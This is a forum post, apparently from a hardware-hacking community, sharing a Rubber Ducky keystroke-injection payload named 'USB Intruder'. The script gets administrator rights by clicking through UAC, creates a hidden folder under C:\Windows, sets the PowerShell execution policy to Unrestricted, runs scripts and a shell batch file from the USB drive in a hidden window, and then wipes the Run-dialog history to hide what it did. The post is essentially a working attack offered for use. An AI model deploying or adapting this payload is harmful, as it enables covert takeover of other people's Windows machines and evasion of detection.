B0rk Posted May 24, 2017 Share Posted May 24, 2017 (edited) Hello all, I am posting the Ducky Script for the USB Intruder I made available on the BashBunny. If you would like to run USB Intruder on the TwinDuck FW, you will need to download the BashBunny payloads from Github and delete the payload.txt from the USB_Intruder payload folder and replace it with the following code for the inject.bin file. I'm being lazy on this post, so if you want more information on it, check the readme.md from my BB Payload. You will also need to name the storage "Ducky" (minus the quotes) in order for this payload to execute properly. DELAY 2000 GUI d DELAY 100 GUI r DELAY 500 STRING powershell -Command "Start-Process cmd -Verb RunAs" ENTER DELAY 1000 ALT y DELAY 800 STRING mkdir C:\Windows\ProgData ENTER STRING attrib +h C:\Windows\ProgData ENTER STRING powershell ENTER DELAY 800 STRING Set-ExecutionPolicy Unrestricted ENTER STRING powershell ".((gwmi win32_volume -f 'label=''Ducky''').Name+'\d.cmd')" ENTER DELAY 2000 STRING cd $Env:WinDir\ProgData ENTER STRING .\seq1.ps1 ENTER DELAY 1000 STRING powershell -WindowStyle Hidden $Env:WinDir\ProgData\shell.bat ENTER STRING exit ENTER STRING exit ENTER DELAY 500 GUI r DELAY 500 STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER Edited May 24, 2017 by B0rk Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.